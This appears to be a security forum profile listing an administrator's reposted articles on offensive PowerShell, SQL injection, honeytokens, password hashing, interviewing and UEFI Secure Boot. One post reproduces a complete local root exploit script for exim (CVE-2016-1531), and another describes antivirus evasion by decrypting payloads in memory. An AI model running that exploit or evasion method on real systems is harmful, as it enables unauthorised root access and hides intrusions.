Nytro

Administrators
Posts: 18725
Days Won: 707

Everything posted by Nytro

  1. Bypassing Local Windows Authentication To Defeat Full Disk Encryption
  2. Introducing PS>Attack

I’ve been a huge PowerShell fan ever since I first discovered it as a Systems Administrator many years ago. It’s an incredibly easy to use, intuitive and powerful language and helped me efficiently address a lot of tasks that came across my plate. Unfortunately, the other Systems Administrators that I worked with were less keen to pick it up. Years of pointing and clicking had made them nervous about using a command line.

For different reasons, the Information Security community is in a similar state. PowerShell is an incredible platform for both offense and defense. There is a lot of cutting edge work being done by members of the PowerShell community, but the Information Security community at large is unaware of a lot of their contributions. This may stem from a lack of interest in Windows development or fear of having to learn yet another scripting language. No matter the reason, a lot of security professionals are missing out on some great work.

ENTER PS>ATTACK

To help make using offensive PowerShell easier, I’ve created PS>Attack. PS>Attack is a custom made console that is designed to emulate PowerShell and enhance it. Built into PS>Attack are over 110 offensive PowerShell commands representing some of the greatest work going on in the offensive PowerShell community. This selection of tools runs the entire gamut of a security assessment including Reconnaissance, Privilege Escalation, Backdoors and Data Exfiltration. It also includes a custom command called “get-attack” which helps to serve as an attack search engine. It takes a word or phrase and returns a list of commands and their descriptions that match what you’re looking for.

(Screenshot: Get-Attack returning a list of commands related to the word “Password”)

All of this is bundled into a single executable that runs on anything from a fresh install of Windows 7 all the way up to a fully patched version of Windows 10. There’s no installer, just double click and start attacking.

NOT JUST FOR THE LAB

In creating PS>Attack, I didn’t want to create a tool that was only used in a lab environment. I wanted to create something that was useful and could find its way into a penetration tester’s bag of tricks. To this end, PS>Attack is designed to evade antivirus and other hurdles. The various scripts and payloads that provide the commands are encrypted before being embedded into the executable. When PS>Attack is run, these scripts are decrypted directly into memory, so the plain text payloads never touch the hard drive. This helps avoid detection by most antivirus solutions. PS>Attack is also written using native .NET functions and objects to process PowerShell code; it does not rely on “powershell.exe”. Because .NET is such an important part of Windows, this means that it’s very difficult for an organization to prevent PS>Attack from accessing the functionality it needs to run.

GETTING PS>ATTACK

PS>Attack is available on our Github account. You can either compile the code yourself using Visual Studio or you can download pre-compiled binaries from the “releases” tab.

ACKNOWLEDGMENTS

PS>Attack relies on a lot of tools to make itself effective and it’s important to make sure that the authors of those tools get the attention they deserve. Scripts from the following tools and frameworks are incorporated into PS>Attack. These tools represent some of the best work being done in offensive PowerShell today:

PowerSploit
Nishang
Inveigh
PowerCat

Jared Haight

Source: http://blog.gdssecurity.com/labs/2016/3/8/introducing-psattack.html
  3. How to pass a programming interview

by Ammon Bartram

This post started as the preparation material we send to our candidates, but we decided to post it publicly.

Being a good programmer has a surprisingly small role in passing programming interviews. To be a productive programmer, you need to be able to solve large, sprawling problems over weeks and months. Each question in an interview, in contrast, lasts less than one hour. To do well in an interview, then, you need to be able to solve small problems quickly, under duress, while explaining your thoughts clearly. This is a different skill [1]. On top of this, interviewers are often poorly trained and inattentive (they would rather be programming), and ask questions far removed from actual work. They bring bias, pattern matching, and a lack of standardization.

Running Triplebyte, I see this clearly. We interview engineers without looking at resumes, and fast-track them to on-sites at YC companies. We’ve interviewed over 1000 programmers in the last nine months. We focus heavily on practical programming, and let candidates pick one of several ways to be evaluated. This means we work with many (very talented) programmers without formal CS training. Many of these people do poorly on interviews. They eat large sprawling problems for breakfast, but they balk at 45-min algorithm challenges. The good news is that interviewing is a skill that can be learned. We’ve had success teaching candidates to do better on interviews. Indeed, the quality that most correlates with a Triplebyte candidate passing interviews at YC companies is not raw talent, but rather diligence.

I fundamentally do not believe that good programmers should have to learn special interviewing skills to do well on interviews. But the status quo is what it is. We’re working at Triplebyte to change this. If you’re interested in what we’re doing, we’d love you to check out our process. In the meantime, if you do want to get better at interviewing, this blog post describes how we think you can most effectively do so.

1. Be enthusiastic

Enthusiasm has a huge impact on interview results. About 50% of the Triplebyte candidates who fail interviews at companies fail for non-technical reasons. This is usually described by the company as a “poor culture fit”. Nine times out of ten, however, culture fit just means enthusiasm for what a company does. Companies want candidates who are excited about their mission. This carries as much weight at many companies as technical skill. This makes sense. Excited employees will be happier and work harder.

The problem is that this can be faked. Some candidates manage to convince every company they talk to that it’s their dream job, while others (who are genuinely excited) fail to convince anyone. We’ve seen this again and again. The solution is for everyone to get better at showing their enthusiasm. This is not permission to lie. But interviewing is like dating. No one wants to be told on a first date that they are one option among many, even though this is usually the case. Similarly, most programmers just want a good job with a good paycheck. But stating this in an interview is a mistake. The best approach is to prepare notes before an interview about what you find exciting about the company, and bring this up with each interviewer when they ask if you have any questions. A good source of ideas is to read the company’s recent blog posts and press releases and note the ones you find exciting.

This idea seems facile. I imagine you are nodding along as you read this. But (as anyone who has ever interviewed can tell you) a surprisingly small percentage of applicants do this. Carefully preparing notes on why you find a company exciting really will increase your pass rate. You can even reference the notes during the interview. Bringing prepared notes shows preparation.

2. Study common interview concepts

A large percentage of interview questions feature data structures and algorithms. For better or worse, this is the truth. We gather question details from our candidates who interview at YC companies (we’ll be doing an in-depth analysis of this data in a future article), and algorithm questions make up over 70% of the questions that are asked. You do not need to be an expert, but knowing the following list of algorithms and data structures will help at most companies.

Hash tables
Linked lists
Breadth-first search, depth-first search
Quicksort, merge sort
Binary search
2D arrays
Dynamic arrays
Binary search trees
Dynamic programming
Big-O analysis

Depending on your background, this list may look trivial, or may look totally intimidating. That’s exactly the point. These are concepts that are far more common in interviews than they are in production web programming. If you’re self-taught or years out of school and these concepts are not familiar to you, you will do better in interviews if you study them. Even if you do know these things, refreshing your knowledge will help. A startlingly high percentage of interview questions reduce to breadth-first search or the use of a hash table to count uniques. You need to be able to write a BFS cold, and you need to understand how a hash table is implemented.

Learning these things is not as hard as many of the people we talk to fear. Algorithms are usually described in academic language, and this can be off-putting. But at its core, nothing on this list is more complicated than the architecture of a modern web app. If you can build a web app (well), you can learn these things. The resource that I recommend is the book The Algorithm Design Manual by Steven Skiena. Chapters 3 through 5 do a great job of going over this material, in a straightforward way. It does use C and some math syntax, but it explains the material well. Coursera also has several good algorithms courses. This one, in particular, focuses on the concepts that are important in interviews.

Studying algorithms and data structures helps not only because the material comes up in interviews, but also because the approach to problems taken in an algorithm course is the same approach that works best in interviews. Studying algorithms will get you in an interview mindset.

3. Get help from your interviewer

Interviewers help candidates. They give hints, they respond to ideas, and they generally guide the process. But they don’t help all candidates equally. Some programmers are able to extract significant help, without the interviewer holding it against them. Others are judged harshly for any hints they are given. You want to be helped. This comes down to process and communication. If the interviewer likes your process and you communicate well with them, they will not mind helping. You can make this more likely by following a careful process. The steps I recommend are:

Ask questions
Talk through a brute-force solution
Talk through an optimized solution
Write code

After you are asked an interview question, start by clarifying what was asked. This is the time to be pedantic. Clarify every ambiguity you can think of. Ask about edge cases. Bring up specific examples of input, and make sure you are correct about the expected output. Ask questions even if you’re almost sure you know the answers. This is useful because it gives you a chance to come up with edge cases and fully spec the problem (seeing how you handle edge-cases is one of the main things that interviewers look for when evaluating an interview), and also because it gives you a minute to collect your thoughts before you need to start solving the problem.

Next, you should talk through the simplest brute-force solution to the problem that you can think of. You should talk, rather than jump right into coding, because you can move faster when talking, and it’s more engaging for the interviewer. If the interviewer is engaged, they will step in and offer pointers. If you retreat into writing code, however, you'll miss this opportunity. Candidates often skip the brute-force step, assuming that the brute-force solution to the problem is too obvious, or wrong. This is a mistake. Make sure that you always give a solution to the problem you’ve been asked (even if it takes exponential time, or an NSA super computer). When you’ve described a brute-force solution, ask the interviewer if they would like you to implement it, or come up with a more efficient solution. Normally they will tell you to come up with a more efficient solution.

The process for the more efficient solution is the same as for the brute force. Again talk, don’t write code, and bounce ideas off of the interviewer. Hopefully, the question will be similar to something you’ve seen, and you’ll know the answer. If that is not the case, it’s useful to think of what problems you’ve seen that are most similar, and bring these up with the interviewer. Most interview questions are slightly-obscured applications of classic CS algorithms. The interviewer will often guide you to this algorithm, but only if you begin the process.

Finally, after both you and your interviewer agree that you have a good solution, you should write your code. Depending on the company, this may be on a computer or a whiteboard. But because you’ve already come up with the solution, this should be fairly straightforward. For extra points, ask your interviewer if they would like you to write tests.

4. Talk about trade-offs

Programming interviews are primarily made up of programming questions, and that is what I have talked about so far. However, you may also encounter system design questions. Companies seem to like these especially for more experienced candidates. In a system design question, the candidate is asked how he or she would design a complex real-world system. Examples include designing Google maps, designing a social network, or designing an API for a bank.

The first observation is that answering system design questions requires some specific knowledge. Obviously no one actually expects you to design Google maps (that took a lot of people a long time). But they do expect you to have some insight into aspects of such a design. The good news is that these questions usually focus on web backends, so you can make a lot of progress by reading about this area. An incomplete list of things to understand is:

HTTP (at the protocol level)
Databases (indexes, query planning)
CDNs
Caching (LRU cache, memcached, redis)
Load balancers
Distributed worker systems

You need to understand these concepts. But more importantly, you need to understand how they fit together to form real systems. The best way to learn this is to read about how other engineers have used the concepts. The blog High Scalability is a great resource for this. It publishes detailed write-ups of the back-end architecture at real companies. You can read about how every concept on the list above is used in real systems.

Once you’ve done this reading, answering system design questions is a matter of process. Start at the highest level, and move downward. At each level, ask your interviewer for specifications (should you suggest a simple starting point, or talk about what a mature system might look like?) and talk about several options (applying the ideas from your reading). Discussing tradeoffs in your design is key. Your interviewer cares less about whether your design is good in itself, and more about whether you are able to talk about the trade-offs (positives and negatives) of your decisions. Practice this.

5. Highlight results

The third type of question you may encounter is the experience question. This is where the interviewer asks you to talk about a programming project that you completed in the past. The mistake that many engineers make on this question is to talk about a technically interesting side-project. Many programmers choose to talk about implementing a neural network classifier, or writing a Twitter grammar bot. These are bad choices because it’s very hard for the interviewer to judge their scope. Many candidates exaggerate simple side projects (sometimes that never actually worked), and the interviewer has no way to tell if you are doing this.

The solution is to choose a project that produced results, and highlight the results. This often involves picking a less technically interesting project, but it’s worth it. Think (ahead of time) of the programming you’ve done that had the largest real-world impact. If you’ve written an iOS game, and 50k people have downloaded it, the download number makes it a good option. If you’ve written an admin interface during an internship that was deployed to the entire admin staff, the deployment makes it a good thing to talk about. Selecting a practical project will also communicate to the company that you focus on actual work. A programmer too focused on interesting tech is an anti-pattern that companies screen against (these programmers are sometimes not productive).

6. Use a dynamic language, but mention C

I recommend that you use a dynamic language like Python, Ruby or JavaScript during interviews. Of course, you should use whatever language you know best. But we find that many people try interviewing in C, C++ or Java, under the impression these are the “real” programming languages. Several classic books on interviewing recommend that programmers choose Java or C++. At startups at least, we’ve found that this is bad advice. Candidates do better when using dynamic languages. This is true, I think, because of dynamic languages’ compact syntax, flexible typing, and list and hash literals. They are permissive languages. This can be a liability when writing complex systems (a highly debatable point), but it’s great when trying to cram binary search onto a whiteboard.

No matter what language you use, it’s helpful to mention work in other languages. An anti-pattern that companies screen against is people who only know one language. If you do only know one language, you have to rely on your strength in that language. But if you’ve done work or side-projects in multiple languages, be sure to bring this up when talking to your interviewers. If you have worked in lower-level languages like C, C++, Go, or Rust, talking about this will particularly help.

Java, C# and PHP are a problematic case. As we described in our last blog post, we’ve uncovered bias against these languages in startups. We have data showing that programmers using these languages in the interview pass at a lower rate. This is not fair, but it is the truth. If you have other options, I recommend against using these languages in interviews with startups.

7. Practice, practice, practice

You can get much better at interviewing by practicing answering questions. This is true because interviews are stressful, but stress harms performance. The solution is practice. Interviewing becomes less stressful with exposure. This happens naturally with experience. Even within a single job search, we find that candidates often fail their initial interviews, and then pass more as their confidence builds. If stress is something you struggle with, I recommend that you jumpstart this process by practicing interview stress.

Get a list of interview questions (the book Cracking the Coding Interview is one good source) and solve them. Set a 20-minute timer on each question, and race to answer. Practice writing the answers on a whiteboard (not all companies require this, but it’s the worst case, so you should practice it). A pen on paper is a pretty good simulation of a whiteboard. If you have friends who can help you prepare, taking turns interviewing each other is great.

Reading a lot of interview questions has the added benefit of providing you ideas to use when in actual interviews. A surprising number of questions are re-used (in full or in part).

Even experienced (and stress-free) candidates will benefit from this. Interviewing is a fundamentally different skill from working as a programmer, and it can atrophy. But experienced programmers often (reasonably) feel that they should not have to prepare for interviews. They study less. This is why junior candidates often actually do better on interview questions than experienced candidates. Companies know this, and, paradoxically, some tell us they set lower bars on the programming questions for experienced candidates.

8. Mention credentials

Credentials bias interviewers. Triplebyte candidates who have worked at a top company or studied at a top school go on to pass interviews at a 30% higher rate than programmers who don’t have these credentials (for a given level of performance on our credential-blind screen). I don’t like this. It’s not meritocratic and it sucks, but if you have these credentials, it’s in your interest to make sure that your interviewers know this. You can’t trust that they’ll read your resume.

9. Line up offers

If you’ve ever read fund-raising advice for founders, you’ll know that getting the 1st VC to make an investment offer is the hardest part. Once you have one offer, more come pouring in. The same is true of job offers. If you already have an offer, be sure to mention this in interviews. Mentioning other offers in an interview heavily biases the interviewer in your favor. This brings up the strategy of making a list of the companies you’re interested in, and setting up interviews in reverse order of interest. Doing well earlier in the process will increase your probability of getting an offer from your number one choice. You should do this.

Conclusion

Passing interviews is a skill. Being a great programmer helps, but it’s only part of the picture. Everyone fails some of their interviews, and preparing properly can help everyone pass more. Enthusiasm is paramount, and research helps with this. As many programmers fail for lacking enthusiasm as fail for technical reasons. Interviewers help candidates during interviews, and if you follow a good process and communicate clearly, they will help you. Practice always helps. Reading lots of interview questions and inuring yourself to interview stress will lead to more offers.

This situation is not ideal. Preparing for interviews is work, and forcing programmers to learn skills other than building great software wastes everyone’s time. Companies should improve their interview processes to be less biased by academic CS, memorized facts, and rehearsed interview processes. This is what we’re doing at Triplebyte. We help programmers get jobs without looking at resumes. We let programmers pick one of several areas in which to be evaluated, and we study and improve our process over time. We’d love to help you get a job at a startup, without jumping through these hoops. You can get started here. But the status quo is what it is. Until this changes, programmers should know how to prepare.

Thanks to Jared Friedman, Emmett Shear, Garry Tan, Alexis Ohanian and Daniel Gackle for reading drafts of this.

Source: http://blog.triplebyte.com/how-to-pass-a-programming-interview
  4. Black Hat Europe 2015 https://www.youtube.com/playlist?list=PLH15HpR5qRsVd9jdTWUB5s16fmr2VCQyS
  5. Data Extraction via String Concatenation in a Blind SQL Injection Vulnerability

March 7, 2016, posted by Carlos Muñoz

Day One: In Which The Heavens Part, But Only Slightly

A few weeks ago while performing a web application test for $CLIENT, I happened to run into search functionality. As one of the very first standard tests I inserted a single quote ' into the search field and clicked the search button. The SQL error message that was returned was the stuff dreams are made of (i.e. a lot of info, slightly vague, not everything there, but enough in that moment to make you really, really believe). After a few quick tests to see if anything easy could be obtained (nope, no such luck), and confirming that I wouldn't be negatively impacting $CLIENT's systems if I did so, I turned it over to automated tools and went about testing other parts of the application.

Time passed, and a few other issues were discovered and documented (it doesn't exist if no one else can reproduce it from your official description), and I went back to view the progress of automated tools, eager to see the keys to the kingdom laid down before me. Nothing. Okay, maybe I made a mistake or two setting the automated tools up? Investigations disproved that line of thinking, as the recorded request/response pairs showed the attacks were being properly sent with all the appropriate data. It is probably my imagination, but I think I can hear $CLIENT's webapp laughing at me. Hmmmm . . . this may be a bit more complex than I had hoped.

Full article: https://www.trustwave.com/Resources/SpiderLabs-Blog/Data-Extraction-via-String-Concatenation-in-a-Blind-SQL-Injection-Vulnerability/
  6. #!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" argument -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

Source: https://github.com/HackerFantastic/Public/blob/master/exploits/cve-2016-1531.sh
  7. Exercises for learning Reverse Engineering and Exploitation

All binaries for these challenges are ELF 64-bit LSB executable, x86-64.

reverse engineering

The goal is to run the challenges like this: ./rX password, and have them print out "password OK". It's reverse engineering, not cracking, so don't patch the binaries if you want to play by the rules. It gets really boring if you don't anyway.

sploit

All the sploit exercises are designed to be solvable with NX+ASLR without being dependent on which libc is used. The idea is you should only interact with stdin / stdout as if it was a remote service; argv & env is not needed for exploitation. The goal is of course to spawn a shell on each one. All of them are tested. Of course you can still do whatever you like, have fun!

Source: https://github.com/wapiflapi/exrs
  8. DCEPT

DCEPT (Domain Controller Enticing Password Tripwire) is a honeytoken-based tripwire for Microsoft's Active Directory. Honeytokens are pieces of information intentionally littered on a system so they can be discovered by an intruder. In the case of DCEPT, the honeytokens are credentials that would only be known by someone extracting them from memory. A logon attempt using these faux credentials would mean someone was inside the network and is attempting privilege escalation to domain administrator.

This proof of concept is being released as open source to benefit Windows system administrators. The goal of this project was to provide a free, simple, honeytoken deployment tool as well as educate administrators about the nature of these attacks. We encourage contributors to build on what we have done and welcome feedback. Has DCEPT helped your organization spot an intrusion before it was too late? We would like to hear from you.

More information about this research project can be found here: https://www.secureworks.com/blog/dcept

Download: https://github.com/secureworks/dcept
  9. The Art of Assembly Language The Art of Assembly Language ................................................................. 1 Volume One: .............................................................................................. 1 Data Representation ................................................................................... 1 Chapter One Foreward ................................................................................ 3 Chapter Two Hello, World of Assembly Language ................................... 11 Chapter Three Data Representation ............................................................ 43 Chapter Four More Data Representation .................................................... 77 Chapter Five ............................................................................................... 109 Chapter Five Questions, Projects, and Lab Exercises ................................. 109 Volume Two: ............................................................................................. 129 Machine Architecture ................................................................................. 129 Chapter One System Organization .............................................................. 131 Chapter Two Memory Access and Organization ........................................ 151 Chapter Three Introduction to Digital Design ............................................ 195 Chapter Four CPU Architecture .................................................................. 225 Chapter Five Instruction Set Architecture .................................................. 261 Chapter Six Memory Architecture .............................................................. 293 Chapter Seven The I/O Subsystem ............................................................. 315 Chapter Eight Questions, Projects, and Labs .............................................. 
Volume Three: Basic Assembly Language
- Chapter One: Constants, Variables, and Data Types
- Chapter Two: Introduction to Character Strings
- Chapter Three: Characters and Character Sets
- Chapter Four: Arrays
- Chapter Five: Records, Unions, and Name Spaces
- Chapter Six: Dates and Times
- Chapter Seven: Files
- Chapter Eight: Introduction to Procedures
- Chapter Nine: Managing Large Programs
- Chapter Ten: Integer Arithmetic
- Chapter Eleven: Real Arithmetic
- Chapter Twelve: Calculation Via Table Lookups
- Chapter Thirteen: Questions, Projects, and Labs

Volume Four: Intermediate Assembly Language
- Chapter One: Advanced High Level Control Structures
- Chapter Two: Low-Level Control Structures
- Chapter Three: Intermediate Procedures
- Chapter Four: Advanced Arithmetic
- Chapter Five: Bit Manipulation
- Chapter Six: The String Instructions
- Chapter Seven: The HLA Compile-Time Language
- Chapter Eight: Macros
- Chapter Nine: Domain Specific Embedded Languages
- Chapter Ten: Classes and Objects
- Chapter Eleven: The MMX Instruction Set
- Chapter Twelve: Mixed Language Programming
- Chapter Thirteen: Questions, Projects, and Labs

Section Five: Advanced Assembly Language Programming
- Chapter One: Thunks
- Chapter Two: Iterators
- Chapter Three: Coroutines and Generators
- Chapter Four: Low-level Parameter Implementation
- Chapter Five: Lexical Nesting
- Chapter Six: Questions, Projects, and Labs

- Appendix A: Answers to Selected Exercises
- Appendix B: Console Graphic Characters
- Appendix D: The 80x86 Instruction Set
- Appendix E: The HLA Language Reference
- Appendix F: The HLA Standard Library Reference
- Appendix G: HLA Exceptions
- Appendix H: HLA Compile-Time Functions
- Appendix I: Installing HLA on Your System
- Appendix J: Debugging HLA Programs
- Appendix K: Comparing HLA and MASM
- Appendix L: HLA Code Generation for HLL Statements

Download: http://portal.aauj.edu/portal_resources/downloads/programming/assembly_language32bit_edition.pdf
10. Password Hashing: Why and How
Posted March 7, 2016 by "No Bugs" Hare, translated by Sergey Ignatchenko, originally published in Overload #129 in October 2015
Author: “No Bugs” Hare

[[About Vol.2 of the upcoming “Development and Deployment of MMOG” book. There is no need to worry, I just need some time to prepare for publishing of Vol.1. “beta” chapters of Vol.2 are planned to start appearing in 3 weeks from now. Stay tuned!]]

Password hashing is a non-trivial topic, which has recently become quite popular. While it is certainly not the only thing which you need to do to make your network app secure, it is one of those security measures every security-conscious developer should implement. In this article, we’ll discuss what it is all about, why hash functions need to be slow, and how password hashing needs to be implemented in your applications.

What is it all about?

Whenever we’re speaking about security, there is always the question: what exactly is the threat we’re trying to protect ourselves from? For password hashing, the answer is very unpleasant: we’re trying to mitigate the consequences arising from stealing the whole of your site’s password database. This is usually accompanied by the potential for stealing pretty much any other data in your database, and represents the Ultimate Nightmare of any real-world security person. Some (including myself) will argue that such mitigation is akin to locking the stable door after the horse has bolted, and that security efforts should be directed towards preventing the database-stealing from happening in the first place.

While I certainly agree with this line of argument, on the other hand implementing password hashing is so simple and takes so little time (that is, if you designed for it from the very beginning) that it is simply imprudent not to implement it. Not to mention that if you’re not doing password hashing, everybody (your boss and any code reviewers/auditors included) will say, “Oh, you don’t do password hashing, which is The Second Most Important Security Feature In The Universe (after encryption, of course).” The most important thing, however, is not to forget about a dozen other security-related features which also need to be implemented (such as TLS encryption, not allowing passwords which are listed in well-known password dictionaries, limits on login rate, etc. etc. – see the ‘Bottom Line’ section below for some of these).

Full article: http://ithare.com/password-hashing-why-and-how/
11. We are looking for Junior Pentester(s). If anyone is interested, send me a PM. Requirements: - Passion.
12. The fingerprint sensor on phones can be fooled with a sheet of paper
Locking your personal smartphone with a biometric sensor is one of the most secure protection methods for such devices. Many have tried to break this protection using various costly methods, but until now printing the fingerprint on a sheet of paper has not had much success. It seems the idea was good, but the equipment was not capable enough to produce a fake fingerprint. The solution? A printer that leaves conductive ink on the paper. Full article and video: http://www.go4it.ro/telefoane-mobile/senzorul-de-amprenta-de-pe-telefoane-poate-fi-pacalit-cu-o-foaie-de-hartie-15100336/
13. Announcing SQL Server on Linux
Posted March 7, 2016 by Scott Guthrie - Executive Vice President, Cloud and Enterprise Group, Microsoft

It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers:
- Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection
- In-memory database support for every workload with performance increases up to 30-100x
- Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and the #1 SAP SD Two-Tier performance benchmark on Windows
- Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices
- Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data
- Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility

These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud.

In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform. Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms.

Extending SQL Server to Also Now Run on Linux

Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017. SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in.

“This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.”

“SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.”

“We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.”

Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we also announced Microsoft R Server, our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata. The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market. Please join me, Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data.

Thanks, Scott

Source: https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/
  14. Exploiting Adobe Flash Player In The Era Of Control Flow Guard
15. AN INTRODUCTION OF UEFI SECURE BOOT AND DISK PARTITIONS IN WINDOWS 10

As a firmware interface standard to replace BIOS (Basic Input/Output System), the UEFI (Unified Extensible Firmware Interface) specification has been a collective effort by UEFI Forum members for a while. UEFI is in essence an abstraction layer between firmware and OS, independent of device hardware and architecture, which provides flexibility for supporting multiple and various OS environments and also acts as a generic target boot environment for drivers, for cross-platform compatibility, as opposed to the need to develop a particular driver for particular hardware. With UEFI, there are also security opportunities to better defend against a class of malware like bootkits and rootkits targeting the pre-boot environment of a device.

Why UEFI Secure Boot

Specifically, UEFI Secure Boot is an option to prevent a device from being tampered with in a pre-boot environment, i.e. the period from power-on to initializing the OS. Malware that injects itself into firmware or ROM, gains hardware access, is loaded before the OS, etc. is difficult to defend against or clean up once a device is compromised. The Secure Boot option performs signature authentication upon executing code during pre-boot. A code/firmware creator is in this case required to digitally sign one’s code with a private key, to be verified against the paired public key upon loading at device startup. Apparently, this process demands a signature database of supported hardware vendors established beforehand, which explains why Microsoft, in fact since Windows 8, has instituted a driver signing process for certifying digital signatures of firmware for implementing UEFI Secure Boot, and there are some changes to the process in Windows 10. Above all, the UEFI Secure Boot specification addresses security issues relevant to boot time exploits and eliminates the possibility of executing untrusted or altered code during pre-boot.

Windows 10 Enterprise supports UEFI 2.3.1 and later for Device Guard, a new and key security feature of Windows 10 Enterprise to ensure hardware and OS boot integrity of corporate devices. The following compares the security features of Windows 10 editions. Additional information comparing Windows 10 editions based on Core Experience and Business Experience is readily available.

Sample Disk Layouts

One easy way for an end user to verify if a device is UEFI-based is to examine the disk layout. Typically a BIOS-based device has two partitions, system and OS, on the primary disk where the OS is installed. A device based on UEFI has a vividly different disk layout from that of BIOS. The following are sample disk layouts of Windows 10 devices based on BIOS and UEFI as reported by Disk Manager and the DISKPART command line utility.

Then BIOS

This is a sample BIOS setup screen of a Windows device. And this is a typical disk layout of a device with BIOS, with a System and an OS partition, as reported by the Windows desktop Disk Manager. A DISKPART session as demonstrated below shows a disk layout consistent with what is reported by Disk Manager, with two partitions accordingly.

Now with UEFI

For UEFI, the following are two sample disk layouts. Notice that either one has an EFI System Partition, i.e. ESP. However, a DISKPART session reveals that there is actually an extra partition, the so-called Microsoft Reserved Partition, or MSR, which:
- has no partition ID and is not reported by Disk Manager
- is not for storing any user data
- is reserved for drive management of the local hard disk

The sizes of ESP and MSR are customizable, and based on business needs, additional partitions can be added. Those involved in OS imaging and enterprise device deployment are encouraged to review and get familiar with the specifics of, and Microsoft’s recommendations on, configuring UEFI/GPT-based hard drive partitions, as detailed elsewhere.

Sample 1, A Typical Disk Layout with UEFI

This is based on a Surface Pro 4 machine purchased from a retail store running Windows 10 Pro Build 10586, as shown. Disk Manager shows a three-partition disk with an ESP of 100 MB in size. On the same device, a DISKPART session reveals that the disk also has a 16 MB MSR as Partition 3.

Sample 2, A Custom Disk Layout with UEFI

Below is a sample company-issued Surface Pro 3 device running Windows 10 Enterprise Insider Preview Build 11082. Here, Disk Manager presents a custom image with four partitions including a 350 MB ESP and a recovery partition after the OS partition. And again, a DISKPART session reveals a 128 MB MSR as Partition 3.

UEFI and GPT

One thing worth pointing out is that when deploying Windows to a UEFI-based PC, one must format the hard drive that includes the Windows partition as a GUID Partition Table (GPT) file system. Additional drives may then use either the GPT or Master Boot Record (MBR) file format.

Manually Enabling Secure Boot

With UEFI already configured, here are manual ways to enable/configure Secure Boot on a Windows 10 device.

A Hardware Short-Cut with Surface Pro devices

There is a convenient way via hardware to change the boot settings of a Microsoft Surface Pro device. While the machine is powered off, pressing the power button and the volume up button at the same time for a few (generally 5 to 10, some may take 20 or more) seconds will bring up the device boot setting screen. And if you keep holding the power and volume up buttons past the boot setup screen for another few seconds, this will eventually trigger reloading the firmware, in my experience. Here is the boot setup screen from the above mentioned Surface Pro 4 device running Windows 10 Pro, purchased from a retail store, and with the Secure Boot options. On the other hand, the following is a boot setup screen from a sample company-issued Surface Pro 3 device with a custom image built and deployed with System Center Configuration Manager. The UI may appear different, but the available settings are mostly the same.

Changing UEFI or Boot Settings via UI

For a Windows 10 device based on UEFI, here is a visual presentation demonstrating how to manually enable UEFI Secure Boot on a Surface Pro 3 device running Windows 10 Enterprise Insider Preview Build 11082. The process begins by clicking Start/Settings from the desktop. Upon the first restart, click the following screens as indicated. And the second restart should bring up the boot setup screen shown earlier in this article. And again as mentioned, the process via UI can be short-cut by pressing the power and the volume up button at the same time for a few seconds, while a Surface Pro device is powered off.

Closing Thoughts

